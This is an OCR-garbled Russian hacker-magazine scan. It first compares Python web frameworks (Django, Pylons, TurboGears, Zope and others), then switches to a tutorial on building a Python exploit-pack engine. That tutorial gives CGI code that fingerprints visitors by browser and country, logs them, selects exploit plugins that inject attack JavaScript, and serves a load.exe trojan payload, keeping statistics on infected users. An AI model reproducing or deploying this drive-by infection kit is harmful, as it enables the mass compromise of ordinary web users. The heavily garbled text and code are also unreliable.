клонников Місгозо^ и С# выбор очевиден — А5Р.ЫЕТ. Любителям ВиЬу 
тоже долго выбирать не приходится — ВиЬу Оп Ра і Із. Сложнее РуіЬоп, 
РНР и Эаѵа- программистам: количество веб-фреймворков для этих 
языков ужасает. Надеюсь, статья внесет некоторую ясность и поможет 
любителям РуіЬоп’а сделать более осознанный выбор. Итак, плюсы 
питоновских веб-фреймворков: 

1) Использование языка РуіЬоп. Наверняка, восхваление Руібоп’а уже 
порядком поднадоело, но на РуіЬоп’е сайт действительно разрабатыва- 
ется быстрее, приятнее и дешевле, чем на многих других языках. 

2 ) Богатый выбор. Обилие фреймворков может испугать только новичка. 
Профессионала же всегда радуетсвобода выбора, поскольку шанс 
найти то, что действительно нужно, увеличивается. Ктомуже, выбор 



порождает конкуренцию, а здоровая конкуренция в свою очередь при- 
водит кулучшению качества каждого фреймворка. Отсюда вытекает 
следующий плюс. 

3) Бурное развитие. Постоянно появляются новые фреймворки, а их 
предшественники либо уступают дорогу молодым, либо продолжают 
борьбу за лидерство: фиксятся баги, вводятся новые фишки. Это от- 
личает веб-сообщество РуіНоп’а от, например, веб-сообщества РиЬу, 
которое в большинстве своем представлено фреймворком РиЬу оп Раііз 
и в котором, в свою очередь, наблюдается некоторый застой из-за отсут- 
ствия новых идей. 

4 ) Орепзоигсе. Наверное, с нашим стобой флибустьерским ментали- 
тетом, это не ахти какой плюс. Но, говорят, легально и бесплатно пользо- 
ваться качественным софтом — это здорово :]. 

На данный момент насчитывается несколько десятков питоновских 
веб-фреймворков. Далее будут подробно рассмотрены три самых круп- 
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ных и известных: 0]а пд о, Руіопз и ТигЬобеагз. Также будут упомянуты 
несколько других интересных фреймворков: Хоре, Тѵѵізіесі, СЬеггуРу. 

КАК ВСЕ НАЧИНАЛОСЬ 

ѴѴогІсІ ѴѴібе ѴѴеЬ появилась в 1 990 году. В 1 996 светувидел 0 га і I — 
веб-браузер, написанный на Питоне. Он существовал всего лишьдо 
1999 года, но дал толчок кдальнейшему развитию питоновских веб- 
библиотек. В 1998 году появился Хоре — настоящий солидный фрейм- 
ворк, своего рода Еппасз для веб-приложений. Но некоторые ставили 
ему в упрек монолитность и громоздкость (фактически, он вводил новый 
язык программирования]. Поэтому начали разрабатываться такие 
фреймворки какѴѴебѵѵаге (2000), Оиіхоіе (2000, по сути — упрощен- 
ный Хоре], Тѵѵізіесі (весьма своеобразный асинхронный фреймворк), 
СЬеггуРу и др. Количество фреймворков росло, какгрибы последождя, 
что обусловило появление стандарта ѴѴ5СІ (о нем чуть позже). Следую- 
щей вехой в истории питоновских фреймворков стал 2005 год. Именно 
тогда появились О)апдо, Руіопз и ТигЬоСеагз — представители новой 
эры «мегафреймворко в». Они совместили традиционные веб-сервисы, 
которые предоставлялись и раньше, стакими аддонами как шаблонные 
«движки», 501 ОРМ, библиотеками ^ѵазсгірі и т.п. Эта тройка лидирует 
по популярности до сих пор. 

ѴѴ56І 

Какуже упоминалось, в Питоне существует большое количество веб- 
фрейм ворков, тул китов и библиотек. Все они по-своемуустанавлива- 
ются и настраиваются, и часто возникает проблема их взаимодействия 
между собой. По этой причине был разработан ѴѴ5СІ (ѴѴеЬ Зегѵег Оаіеѵѵау 
I пііегбасе] — стандарт взаимодействия между РуіЬоп-программой, 
выполняющейся на стороне сервера, и самим веб-сервером. Все со- 
временные питоновские веб-фреймворки ему соответствуют. Втом 
числе, ѴѴ56І определяет тісісііеѵѵаге-компоненты, которые предостав- 
ляют интерфейсы как приложению, так и серверу. То есть, для сервера 
т і б б Іеѵѵаге является приложением, а для приложения — сервером. Это 
позволяет составлять цепочки ѴѴ50І-совместимых т ісісі Іеѵѵа гез. Таким 
образом (втеории), подбирая нужные ітлсісі Іеѵѵаге -компоненты, можно 
составлять собственные фреймворки! Эта концепция наиболее широко 
проявила себя в Руіопз (о чем будет рассказано далее). 

мѵс 

Архитектура многих фреймворков сходна между собой и соответствует 
паттерну МѴС (Мобеі-Ѵіеѵѵ-Сопігоііег). Согласно этому паттерну, при- 
ложение разбивается на три части: 

• Модели — содержат данные, с которыми работает приложение. Часто 
соотносится стаблицами базы данных. 

• Виды — отвечают за чтение данных из модели и их отображение 
пользователю. 

• Контроллер — логика приложения. Он вызывает виды для отобра- 
жения данных пользователю, либо получает данные от пользователя и 
сохраняет их в моделях. 

Идея МѴС в изоляции, такчто можно менять одну часть, не ломая другие. 

о^ыоо 

Самый популярный на данный момент из своих собратьев. Был разра- 
ботан специально для быстрого иудобного написания новостных сайтов 
компании ТЬе ѴѴогШ Сотрапу ее сотрудниками Эдрианом Холовати 
и Симоном Виллисоном. Начал разрабатываться еще с 2000 года, но 
широкой общественности был представлен лишь в середине 2005-го. 
Свое название получил в честь джазового гитариста Джанго Рейнхардта 
[а я думал , что в честь того Джанго из одноименного вестер- 
на і, который таскал с собой пулемет в гробу на веревочке :( 

— Прим. ред.]. 

Сайт на Б)апдо строится из одного или нескольких приложений, которые 
рекомендуется делать отчуждаемыми и подключаемыми (в отличие, на- 
пример, от Рыбу оп Раііз]. Одно из самых больших преимуществ Б)апдо 

— отличная документация и, пожалуй, самое крупное сообщество среди 
питоновских веб-фреймворков. 

Чтобы загрузить первую пробную страницу сразу после установки, требу- 
ется всего три действия: 

1) Создать новый проект командой сІ]апдо-асІтіп. ру зЕа г1;рго]ес1; тузііе. 



2 ) Запустить локальный сервер: руіЬоп тападе.ру гипзегѵег. 

3) Запустить браузер и перейти по адресу ЫірѴ/І 27.0.0.1 :8000 — откро- 
ется симпатичное окно с приветствием. 

При знакомстве с Б)апдо в первую очередь подкупаетего встроенный 
интерфейс администратора. В удобной форме он позволяет работать с 
контентом написанного сайта. Необходимо немного изменить настрой- 
ки, и по адресу ЫірѴ/1 27.0.0.1 :8000/асІппіп в браузере можно запустить 
страницу, через которую можноуправлять контентом (например, про- 
сматривать содержимое базы данных и изменять его]. 

Архитектура Б)апдо несколько отличается от классического МѴС. 
Контроллер классической модели МѴС примерно соответствуетуровню, 
который в О)апдо называется «Вид», а презентационная логика Вида 
реализуется уровнем Шаблонов. Из-за этого уровневую архитектуру 
Б)апдо часто называют«Модель-Шаблон-Вид» (МТѴ). 

Для моделей Б)апдо предоставляетуровеньабстракции, который избав- 
ляет от необходимости писать 5С1Е-запросы для получения/сохранения 
данных в базу данных. Все таблицы, которые используются в прило- 
жении, пишутся в виде классов в отдельном файле тосіеіз.ру. Далее 
в коде, при помощи методов этих классов, происходит манипуляция 
содержимым таблиц. Таким образом, работа с базой данных становится 
полностью объектно-ориентированной. Б)апдо поддерживает работу с 
основными базами данных (РозІдгеЗОЕ, ЗОЕіІеЗ, МуЗОЕ, Огасіе]. 

Также отметим весьма гибкий способ отображения игіов на функции 
приложения — при помощи регулярных выражений. 

При разработке приложения удобно пользоваться встроенным серве- 
ром — он автоматически определяет изменения в файлах исходного 
кода проекта и перезапускается. Результат внесенных в код изменений 
сразу же отображается на веб-странице браузера, но использовать его в 
качестве «боевого» крайне не рекомендуется, так как однопоточен и не 
предусматривает никаких мер безопасности. Для этих целей придется 
настраивать нормальный сервер (например, АрасЬе). Назовем некото- 
рые недостатки О)апдо: 

• Язык шаблонов хоть и простой, но не очень«питоничен». 

• Не слишком удобная работа сАЗАХ; 

• Некоторым кажется, что в нем многовато «магии»; 

• Могут возникнутьтрудности при замене компонентов (если ты не 
дружишь с регулярными выражениями, которые широко используются 
при отображении игГов, то тебе может захотеться использовать другой 
диспетчер). Бытует мнение, что 0)апдо-разработчики частенько изо- 
бретают велосипеды (правда, О)апдо дает возможность делать это легко 
и быстро]. 

РУЬОЫЗ 

Руіопз появился в сентябре 2005-го на основе Разіе (набора утилит для 
разработки веба на РуіЬоп’е; это своего рода фреймворкдля фрейм- 
ворков]. Его создатель — Бен Бангерт. Среди всех фреймворков именно 
Руіопз лучше всего отвечает ѴѴЗСІ -архитектуре, причем он был задуман 
таким с самого начала. В мире фреймворков он является своего родом 
антиподом О)апдо. Все его компоненты образуют тісісі Іеѵѵа ге-стек (о 
котором упоминалось чуть выше при описании ѴѴ50І]. Программист мо- 
жетзаменить любую из составляющих этого стека на другой ті б б Іеѵѵаге. 
Такой подходделает Руіопз потрясающе гибким! Между прочим, нечто 
сходное можно увидеть у БІпіх-систем. Те следуют принципу: лучше 
много ускоспециализированныхутилит, каждую из которых можнозаме- 
нить на что-то более подходящее, чем одна большая, которая умеет все. 
Очень сильное влияние на него оказал набиравший тогда популярность 
Рыбу Оп Раііз — такие важные компоненты как Роиіез и ѴѴеЬНеІрегз 
взяты именно из РоР. 

Руіопз содержит следующие компоненты: Разіе каквеб-сервер, 
ЗОБАІсЬетудля ОРМ, Мако (или МудЫу] для шаблонов, Роиіез какдиспет- 
чер игі-запросов. Полезными функциями обладает ѴѴеЬНеІрегз (напри- 
мер, работа сАЗАХ, создание Р55]. Еще раз подчеркну, что любой из этих 
компонентов можнозаменить по вкусу. Таким образом, Руіопз закрывает 
практически все вышеупомянутые недостатки О]апдо: гибкость в выборе 
компонентов, удобная работа с АЗАХ. Ктомуже, имевшие ранее дело с РиЬу 
Оп Раііз сразу почувствуют себя в своей тарелке. Тем не менее, Руіопз не 
лишен недостатков. Какни странно, они вытекают из его достоинств: 

• Руіопз не занимается документацией, поддержкой и улучшением 
компонентов, которые в нем можно использовать — эта ответственность 
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• ЫірУ/сфЬоок.ги 

— русский пере- 
вод книги по 0)апдо 
(правда, местами еще 
неполный). 

• Ы1р://руоЬ)ес1.ги/ 
Ыод/2007/01/31/ 
сопсеріз-оі-руіопз 

— описание Руіопз, 
сравнение с 0)апдо и 
ТигЬоСеагз. 

• ШрУ/еп.ѵѵікіресІіа. 
огд/ѵуікі/Сотрагізоп 
оі ѵѵеЬ арріісаііоп 
Ігатеѵѵогкз 

— сравнение 
веб-фреймворков (не 
только Питоновских). 




> іпіо 



• Один из создателей 
0)апдо — профессио- 
нальный журналист, 
и это лучшим образом 
сказалось на качестве 
документации! 



• Сразу после выхода 
ТигЬоОеагз приобрел 
огромную популяр- 
ность: за первые 3 
месяца было скачано 
более 30000 скрин- 
касто в. 



• В 2оре Согро- 
гаііоп (фирме- 
создательнице 2оре] 
с 2000 по 2003 год 
работал сам Гвидо 
ван Россум (автор 
РуіЬоп’а]. 
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лежит на производителях компонент. В результате, если, 
к примеру, ты наталкиваешься на баг при использова- 
нии БОЬОЬіесІ:, то трудно понять, кто виноват: Руіопз или 
ООЬО^есТ Отсюда также следует, что чаще всего докумен- 
тацию придется искать не по Руіопз, а по какому-то отдель- 
ному компоненту. И не всегда он бывает документирован 
надлежащим образом. 

• Отметим меньший размер комьюнити по сравнению с 
О)апдо или ТигЬоОеагз. Но не стоит из этого делать поспеш- 
ных выводов о качестве. Например, есть возможность без 
проблем установить контакт непосредственно с лидерами 
проекта. Крометого, баги фиксятся быстро и эффективно 
(что не всегда можно сказать о том же Оіапдо]. 

Т1ЖВ06ЕАК5 

Также, как и 0]а пдо, ТигЬоОеагз был разработан для 
быстрого создания новостных сайтов. Но его автор, Кевин 
Дангор, пошел по другому пути. Дело в том, что когда О)апдо 
создавался (2000), еще не существовало необходимых 
компонент (например, 50І_ ОРМ), поэтому разработчикам 
пришлось создавать собственные решения. ТигЬоОеагз 
же разрабатывался позже, поэтому перед Кевином был 
довольно богатый выбор уже готовых компонент. Кевин вы- 
брал лучшие и разработал новый фреймворк — ТигЬоОеагз. 
Были выбраны: СЬеггуРудля диспетчеризации игі как 
ЫТр-сервер и система конфигурации; Кіб для шаблонов; 
БОЬОЬіесІ: для базы данных; МосЬіКіІ для ^ѵазсгірГ 
Посколькутогда не было подходящих компонент для 
интерфейса администратора, авторизации пользователей, 
работы с формами, то они были разработаны с нуля. 

Однако такой подход поставил ТигЬоОеагз в зависимое 
положение от развития выбранных сторонних компонент, 
что и привело к неприятным последствиям. Поддержка Кіб 
прекратилась, и ему на смену пришел ОепзЬі. ООЬАІсЬету 
начал вытеснять ООЬО^есГ Были обнаружены недостатки в 
библиотеках ^ѵазсгірГ Ктомуже, некоторые пользователи 
требовали ѴѴ50І, Поиіез и СЬееІаЬ. Пришлось принимать 



меры: проблему с шаблонами решили, разработав новый 
шаблонный движок Ви^еГ были написаны НОѴѴТОз для 
ООЬАІсЬету; СЬеггуРуЗ начал поддерживать ѴѴ50І и 
Поиіез. 

Разработчики пришли к мысли, что понятие «лучший 
компонент» субъективно и непостоянно. Фокус был смещен 
в сторону гибкости, которой изначально ТигЬоОеагз (как и 
О)апдо) был обделен. Именно поэтому в 2007 году светуви- 
дел ТигЬо0еагз2, который был построен на основе Руіопз. 
Конечно, это не значило, что ТигЬоОеагз слился с Руіопз, 
хотя событие и сблизило комьюнити обоих фреймворков. 
ТигЬоОеагз по-прежнему держит курс на использование 
сторонних, дружественных к пользователю компонент, 
Руіопзже концентрируетусилия на компонентах, состав- 
ляющих его «ядро». Оба стараются использовать общие 
компоненты для общих нужд (например, хотя Руіопз и 
использует поумолчанию для шаблонов Мако, онтакже 
поддерживает использование ОепзЬі, который характерен 
для ТигЬоОеагз). На данный момент поддерживаются обе 
ветки: 1 .х и 2.x, но рекомендуется по возможности пере- 
ходить на 2.x. 

Недостатки: 

• Недальновидная ставка на «лучшие сегодня» компонен- 
ты (со временем ситуация может измениться); 

• Неполная совместимость 1 .х и 2.x версий; 

• По сравнению с О)апдо: не такая полная документация 
(местами содержит рецепты и примеры, а не справочники); 
менее прозрачная схема игіов. 

20РЕ 

Как уже упоминалось, 2оре был первым из полноценных 
питоновских веб-фреймворков, и его архитектура доста- 
точно сильно отличается отархитектуры собратьев. Осо- 
бенностью 2оре является объектно-ориентированность: 
все данные представляются в виде компонентов, 
занимающих определенное место в общей иерархии 
и хранящихся во встроенной объектной базе данных 
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СРАВНЕНИЕ НЕКОТОРЫХ ФРЕЙ МВОРКОВ 



(2оЕЮ). По сути, программирование в 2оре сводится к проектирова- 
нию иерархии компонентов. Многие фишки 2оре стали следствием 
такого подхода. Например, механизм асдиізіЬоп — нечто похожее на 
наследование в ООП: каждый объект наследует поведение и свойства 
объектов, в иерархии которых находится (родителей]. По правде 
говоря, такое поведение может послужить источником сюрпризов, 
поэтому в 2ореЗ использование механизма сделали явным. Многие 
ставили 2оре в упрек монолитность и громоздкость, поэтому в конце 
2004 года общественность увидела 2ореЗ. Главным отличием стала 
модульность фреймворка, что придало ему еще большую гибкость. 
Причем, он не поддерживал обратной совместимости с 2оре2, что обу- 
словило внедрение парадигм 2ореЗ в прежнюю 2оре2. Таким образом, 
сейчас развиваются обе ветки. С 2007 года появилась возможность 
устанавливать модули, пользуясь питоновской едд-технологией. На 
данный моментэто единственный способ обновлять 2ореЗ (последнее 
обновление «одним куском» 3.4 было в начале 2009 года и больше не 
предвидится]. 2оре — активно развивающийся стабильный продукт. 

В 2006 появился 6 гок — новый веб-фреймворк, расширяющий идеи 
2ореЗ. 

ТѴѴІ5ТЕО 

Основывается на парадигме событийно-ориентированного 
программирования: следуя ей, пользователь пишет короткие 
функции обратного вызова, которые затем вызываются фреймвор- 
ком. Центральной является концепция отложенных вычислений. 
Вычисление некоторого выражения может оказаться невоз- 
можным (например, для этого требуются данные от удаленного 
клиента]. Такие выражения могут существовать в виде объектов, 
но их значение не может быть запрошено. С каждым выражением 
связана цепочка функций обратного вызова. Когда необходимые 
данные становятся доступными, результат вычисления выраже- 
ния передается по этой цепочке. Работа с потоками организована 
потомуже механизму. 



СНЕКВѴРѴ 

Одной из целей создателя языка — Реми Делона — было сотво- 
рение библиотеки, которая бы максимально соответствовала 
пито но веко му стилю (как раз то, чего порой не хватает О]апдо или 
2оре]. Это позволило разработчикам использовать фреймворк как 
любой обычный модуль РуіЬоп и не думать об особенностях веб- 
программирования. 

СЬеггуРу представляет собой надстройку над Ыір-протоколом, но 
остается на низком уровне. Он может выступать в качестве самостоя- 
тельного веб-сервера или работать под управлением другого сервер- 
ного приложения, поддерживающего протокол ѴѴ50І. Он не занимается 
такими задачами, какобработка шаблоновдля вывода данных, доступ к 
базе данных и авторизация пользователя. Фреймворк расширяется за 
счетфильтров, простых интерфейсов, состоящих из функций, которые 
вызываются в определенныхточках процесса обработки запросов/от- 
ветов. 

Как уже упоминалось, СЬеггуРу был выбран в качестве компонента 
ТигЬоОеагз для диспетчеризации и гі как Ыір-сервер и система конфи- 
гурации, что говорит о том, что в то время он был лучшим. 

ЗАКЛЮЧЕНИЕ 

Из множества питоновских веб-фреймворков пока можно выделить 
трех фаворитов: 0 ] а п д о , Руіопз и ТигЬоОеагз. И если с последним у 
некоторых могут возникнуть сомнения, то О]апдо и Руіопз можно смело 
рекомендовать для разработки сайта. Если тебя привлекает гибкость и 
модульность — значит, выбор падает на Руіопз. Если устраивает целост- 
ный, хорошо настроенный и документированный набор компонент — 
используй О]апдо. 

В действительности, каждый фреймворк имеет свои удобства 
(иначе он бы не приобрел известность]. Фреймворк — это всего 
лишь инструмент, и то, какой будет выбран, в первую очередь 
должно зависеть от поставленной задачи, и только потом от его 
популярности, ц-ц 
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СООІЫО 



■ ■ РОМАН «РРЕОЮЕііМТУА» ХОМЕНКО / НТТР://ТІЛАМС.СОМ / 





I 

ІсеРаск 



Ріге-Раск 



ГРУЗИ 

СПЛОИТЫ 



БОЧКАМИ! 



Ріезіа 



Пишем движок для сплоит-связки на РуІЬоп 

Ріезіа, Ріге-Раск, ІсеРаск, Тогпасіо и множество других связок сплоитов 
знает мир хакеров, но ни одна из них не написана на РуіЬоп’е. 

Этот пробел мы и будем устранять. 



вязка сплоитов — это ѵѵеЬ-система, которая объединяет 
несколько сплоитов. При заходе пользователя на страничку 
сплоиты применяются, вследствие чего происходитзагрузка 
полезного программного обеспечения (бота, трояна, кейло- 
гера] на компьютер юзера. Крометого, связка ведет стати стику, где фик- 
сирует, кто заходил на страницу, и кто из юзеров был «пробит» сплоитом 
и заражентрояном. Мы разберемтехнологию, как практически реализу- 
ется эта связка, но не будем внедряться в сам процесс сплоитописания 
(поскольку это тема отдельной статьи, а точнее — целой сотни статей]. 

ИТАК, В НАШЕЙ ПЛАНИРУЕМОЙ СВЯЗКЕ Я БЫ ВЫДЕЛИЛ ЧЕТЫРЕ 
ЧАСТИ: 

• выбор сплоита; 

• отдача полезной нагрузки; 

• админка; 

• сплоиты. 

Для чего нужна каждая часть, мы подробно узнаем в процессе ее реали- 
зации. 



ЫНДЕКС.РѴ 

Первая и самая главная часть, далее именуемая «Ы», на запрос поль- 
зователя должна проанализировать его браузер и отдать страницу с тем 
сплоитом, который с наибольшей вероятностью «пробьет» юзера. Кроме 
того, скриптзанесет в базу данных статистику о пользователе. Мы будем 
реализовывать простой вариант, когда пользователю отдаете я толь ко 
один сплоит. Разумеется, в большинстве случаев лучше использовать 
несколько сплоитов, которые поочередно применяются ротором на 
ЭаѵаБсгірІ, но эту идею мы прибережем для следующих релизов. 
Реагировать на запрос юзера будем через еді (о нем читай во врезке]. 

Для тестирования этого хозяйства лучше всего скачать Оепѵѵег и модуль 
к нему для РуіЬоп’а (я уже скачал, установил, настроил для тебя, так что 
просто копируй с нашего диска и запускай]. 

Первый модуль будет полностью содержаться в файле Ындекс — іпбех. 
ру. Для отображения страницы с использованием С6І надо указать, что 
скриптнаписан на РуіЬоп’е, и еще нужно обязательно указать заголовок с 
полем СопІепМуре, пустую строку для отделения заголовка отосновного 
тела и непосредственно наш НТМІ_: 
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# ! /изг/Ъіп/руДіюп 

# сосііпд : иДД-8 -*- 

ітрогД оз , зуз 
ітрогД здІіДеЗ 
ітрогД рудеоір 

Дгот ЗДгіпдІО ітрогД ЗДгіпдІО 

# здесь статистика, аналогичная іпсіех.ру 



РАЗУМЕЕТСЯ, В БОЛЬШИНСТВЕ 
СЛ У Ч АЕ В Л У Ч Ш Е И СП ОЛ Ь- 
ЗОВАТЬ НЕСКОЛЬКО СПЛОИ- 
ТОВ, КОТОРЫЕ ПООЧЕРЕДНО 

ПРИМЕНЯЮТСЯ РОТОРОМ НА 
МѴА5СШРТ. 



Дгу: # 7/іпсіомз опіу 

ІтрогД тзѵсгД 

тзѵсгД . зеітойе ( зуз . зДсіоиД . Дііепо ( ) , оз . 0_ВШАКУ) 
ехсерД ІтрогДЕггог: разз 

ргіпД ' СопДепД-Туре : арр1ісаДіоп/х-осДеДзДгеат' 
ргіпД ' СопДепД-БізрозіДіоп : аДДасЪтепД; \ 
Ді1епате=1оас1. ехе 1 
ргіпД ' СопДепД-ТіДІе : Іоасі.ехе' 
ргіпД 

зуз . зДсіоиД .шгіДе ( 

Дііе (г " . /сіаДа/Іоасі. ехе" , " гЬ" ) . геасі ( ) ) 



ітрогД рудеоір 

ді = рудеоір . СеоІР ( ' . /рудеоір/СеоІР . сіаД ' ) 
ее = ді . соипДгу_сосіе_Ъу_асІсІг ( ір ) 

В результате его работы в переменной ‘сс’ появится сокращение 
страны — ги, иа, из. Чрезвычайно удобная библиотека! 

БОЫТЕ 

Вернемся к СОБКе. Для примера напишем скрипт инсталляции 
і пзіа II. ру и разместим его в папке сЫа. Он будет создавать пустую 
базу данных с двумя таблицами: 



# ! /изг/Ъіп/руДіюп 
# сосііпд: иДД-8 -*- 

ргіпД ' СопДепД-Дуре : ДехД/ЪДтІ' 
ргіпД 

ргіпД ' <Ь.1>ХЕК</Ы> ' 

Чтобы разрешить СОІ, еще нужно создать файл .Ыассезз со строчкой: 

ОрДіопз +ЕхесССІ 

СОІ-интерфейс, кроме отдачи страницы в браузер, позволяет получать 
некоторую дополнительную информацию. В первую очередь нас интере- 
сует, откуда юзер пришел — геіегег, его ІР, а также ІІзег-адепІ — все это 
хранится в переменной епѵігоп из модуля оз. Получить их можно воттак: 

ітрогД оз 

ір = оз . епѵігоп [ " ЕЕМОТЕ_АББЕ " ] 
иа = оз . епѵігоп [ "НТТР_ІІ8ЕЕ_АСЕЕТ" ] 
гі = оз . епѵігоп [ "НТТР_КЕЕЕКЕК" ] 

Более красивый способ, через СЕТ: 

иа = оз . епѵігоп. деД ( "НТТР_ІІЗЕК_АСЕЫТ" , ' Ы/А' ) 

Если ІІзег-адепІ; не определен, тогда переменной будет присвоен 
второй аргумент, строка ‘І\І/А\ 

Информацию о пользователе мы получили. Настало время сохра- 
нить ее в базу данных (мы используем ЗОЫіе). Кстати, совсем забыл 
— в статистику лучше добавить и страну происхождения юзера. 

Для этих целей используются специальные базы соответствия 
ІР-адреса и страны. Мы будем использовать бесплатную версию 
базы с сайта ЬирѴ/тахтіпб.сопп . Чтобы работать с ней легко и не- 
принужденно, скачай библиотеку с сайта ЬирѴ/сосІе.доодІе.сопп/р/ 
рудеоір . Скопируем эту библиотеку и базу в папку рудеоір. Тогда в 
нашем скрипте Ындекс.ру станет возможным использовать код: 



КОД СКРИПТА ІЫОЕХ.РѴ 



# ! /изг/Ьіп/руДДюп 
# сосііпд: иДД-8 -*- 

ігпрогД оз 
ітрогД здІіДеЗ 
ітрогД рудеоір 

ір = оз . епѵігоп. деД ( " ЕЕМОТЕ_АББЕ " , 127.0.0.1') 
иа = оз . епѵігоп. деД ( "НТТР_БЗЕЕ_АСЕЕТ" , ' ' ) 
гі = оз . епѵігоп. де Д ( "НТТР_КЕЕЕКЕК М , 1 ') 

ді = рудеоір . СеоІР ( ' . /рудеоір/СеоІР . сіаД ' ) 
сс = ді . соипДгу_сосіе_Ьу_асі(іг ( ір) 

сопп = здІіДеЗ . соппесД ( ' . /сіаДа/Ьазе . <ЗЬ ' ) 
сопп. ехесиДе ( ' 1№ЕЕТ ШТО епДег (ір,иа, гД , сс) \ 
ѴАЬБЕЗ (?,?,?,?)',( ір , иа , г Д , сс ) ) 
сопп . согшпіД ( ) 
сопп . сіозе ( ) 

Дог Дпате іп оз . ІізДсііг ( ' зрІоіДз ' ) : 

ІД Дпате . епсізміДІі ( ' .ру ' ) : 
р1идіп_пате = Дпате [ : -3 ] 

ІД р1идіп_пате != ' іпіД ' : 

р1идіпз= ітрогД ( ' зрІоіДз. ' +р1идіп_пате) 

ріидіп = деДаДДг (ріидіпз , р1идіп_пате) 

ІД ріидіп. іпіД (иа) : 
ріидіп. гип ( ) 
ехіД ( ) 

ргіпД ' ЗДаДиз : 404 ЕГоД Еоипсі' 
ргіпД ' СопДепД-Дуре : ДехД/ЬДтІ' 
ргіпД 

ргіпД ' БоД Еоипсі' 
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Ріге-Раск 



Ріезіа 



Сюда желательно добавить проверочку на предмет 
установления факта «а заходил ли пользователь к нам 
раньше?». Если заходил — продемонстрировать ошибку 
404. Этот код ты сможешь реализовать сам или подсмотреть 
в исходнике на нашем диске. 

ЗАГРУЗКА ПЛАГИНОВ 
СОСПЛОИТАМИ 

После сбора статистики обычно следует проверка на 
браузер, результат которой определит выбор конкретного 
сплоита из списка. Мы поступим чуть красивее — будем 
использовать плагины, размещенные в папке сіаіа/зріоііз. 
Каждый сплоит представляет собою файл, содержащий 
две функции — і п И; и гип. Функция іпіі; на вход получает 
изег-адепі и определяет, сможетли она пробить браузер; 
если да — возвращает 1 , если нет — 0. Амы в свою очередь, 
если получили 1 , запускаем функцию гип, которая встав- 
ляетэксплоит в страницу. С плагинами мы уже работали 
во время написания ]аЬЬег-бота для администрирования, 
а код, который загрузит все плагины и запустит их, можно 
подсмотреть на врезке. 

Если же мы обработали все плагины и они с прискорбием 
сообщили, что не смогут пробить браузер пользователя, — 
придется показать тому страницу с ошибкой 404: 

ргіпЬ ' ЗЬаЬиз : 404 ЕГоЬ Еоипй' 
ргіпЬ ' СопЬепЬ-Ьуре : ЬехБ/ЬЩй * 
ргіпЬ 

ргіпЬ ' КГоЬ Еоипй' 

Сами сплоиты зачастую выглядяттак: вначале идетобыч- 
ная проверка на версию браузера и операционной систе- 
мы, а дальше, в гип — вывод или правильного яваскрипта, 
или картинки/флешки, или другого интересного объекта: 

йеі іпіЬ (иа) : 

іі иа . ііпй ( ' Орега/9 . 6 ' ) апй \ 
иа . і іпсі ( ' ЭДіпйсжз ЕГТ ' ) : 
геЬигп 1 
геЬигп О 

Йеі гип (игі ) : 

ргіпЬ " СопЬепЬ-Ьуре : ЬехЬ/ІШтІ" 

ргіпЬ 

ргіпЬ ' ' ' 

<зсгірЬ 1апдиаде=йаѵаЗсгірЬ> 



гфЬіі 



1 НТТР://ѴѴѴт1 



1 г 

> Ііпкз 

• Крупнейшее вме- 
стилище багов: 
тіІУѵОгт.сопп . 

• ЮЕ РуЗсгірІег: 
собе.доодіе.сот/р/ 
рузсгіріег . 

• СайтЗОББе: 
ѵѵѵѵѵѵ.здіііе.огд . 

• Сайт РуОзоп’а: 
руОіоп.огд . 



> СІѴСІ 

• На диске покоятся 
полные скрипты 
написанной связки 
сплоитов. 



• Без демонстраци- 
онного видео я тебя 
не оставлю — смотри 
его с нашего диска. 



ітрогЬ здІіЬеЗ 

сопп = здІіЬеЗ . соппесЬ ( ' Ъазе . ЙЪ ' ) 
сопп. ехесиЬе ( " СЕЕАТЕ ТАВЬЕ епЬег \ 

(ІЙ ШТЕСЕК РКІМАКУ КЕУ АЬТОШСКЕМЕЬТ , ір , \ 
иа, гі, сс, йаЬе ЬЕЕАЬЬТ СІШКЕЕТ_ТІМЕЗТАМР) ") 
сопп. ехесиЬе ( "СКЕАТЕ ТАВЬЕ Іоай \ 

(ІЙ ШТЕСЕК РКІМАКУ КЕУ АЬТОШСКЕМЕЖ 1 , ір , \ 
иа, гі, сс, ЙаЬе БЕЕАЬЬТ СШКЕМТ_ 

ТІМЕЗТАМР) " ) 
сопп . соішпіЬ ( ) 
сопп. сіозе ( ) 

В первой строчке мы импортируем библиотеку для работы 
с здІБеЗ. Далее — создаем подключение к базе данных; 
если файла нет, то он сразу будет создан автоматически. 
Затем к базе данных мы делаем два ЗОБ-за проса по 
созданию таблиц: одну для сохранения информации всех 
пользователей, которые зашли на связку, а вторая — для 
зараженных юзеров. Как видим, ЗОБ-синтаксис не- 
сколько упрощен тем, что не указывается тип поля, потому 
что типы полей при создании таблицы декларативные. 

При сохранении записи движок сам определяет, в каком 
формате их сохранять. Тип данных конкретного столб- 
ца может меняться от строки к строке. Также мы видим 
созданные нашими руками два автоматических поля; 
первое — автоинкрементный ключ, а второе — поле сіаіе. В 
него автоматически записывается текущая дата и время. 
Теперь в наш файл Ындекс.ру можно добавить строчки для 
ведения статистики: 

сопп = здІіЬеЗ . соппесЬ ( ' . /йаЬа/Ъазе . ЙЪ ' ) 
сопп . ехесиЬе ( ' ШЗЕКТ ШТО епЬег ( ір , иа , г і , сс ) \ 
ѴАЬЬЕЗ (?,?,?,?)', (ір,иа,гІ,сс) ) 



сопп . СОГШПІЬ ( ) 



ІипсЬіоп йс (х) {ѵаг 1=х. 



сопп. сіозе ( ) 



ІепдЫі, Ь=1024 , і , з , . . . 



С6І 

ССІ (от англ. Соттоп баіеѵѵау 
Іпіегіасе — «общий интер- 
фейс шлюза») _ стандарт 
интерфейса, используемого для 



связи внешней программы с веб- 
сервером. 

Сам интерфейс разработан так, 
чтобы можно было использовать 
любой язык программирования, 
который может работать со 
стандартными устройствами 



ввода/вывода. Такими возмож- 
ностями обладают даже скрипты 
для встроенных командных 
интерпретаторов операционных 
систем, поэтому в случаях, когда 
нет нужды в сложной функ- 
циональности, могут использо- 



ваться эти простые командные 
скрипты. 

Хотя мы и используем ССІ для 
примера из-за простоты, на 
практике он уступает альтер- 
нативам (РазіССІ, 5ССІ, ѴѴ5СІ 
ипр.). 
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ОТДАЧА ПОЛЕЗНОЙ НАГРУЗКИ 

Сработавший в браузере сплоит всегда старается загрузить на ЭВМ 
юзера полезный груз — в нашем случае со скрипта ІоасІ. ру. Этотскрипт 
должен сначала занести статистику в файл базы, а затем — отдать 
нагрузку, файл Іоаб.ехе. Со статистикой мы уже разобрались — код, 
аналогичный таковому из Ындекс.ру, но вноситон данные не втаблицу 
